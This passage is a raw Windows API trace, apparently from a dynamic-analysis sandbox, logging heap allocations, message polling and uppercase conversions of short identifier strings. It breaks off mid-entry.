[0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.851] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.852] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.852] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.856] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.856] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.856] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.856] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.857] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.857] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.858] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.858] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.859] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.859] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.859] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.859] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.859] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.860] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.860] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.861] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.861] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.862] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.862] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.862] HeapFree (in: 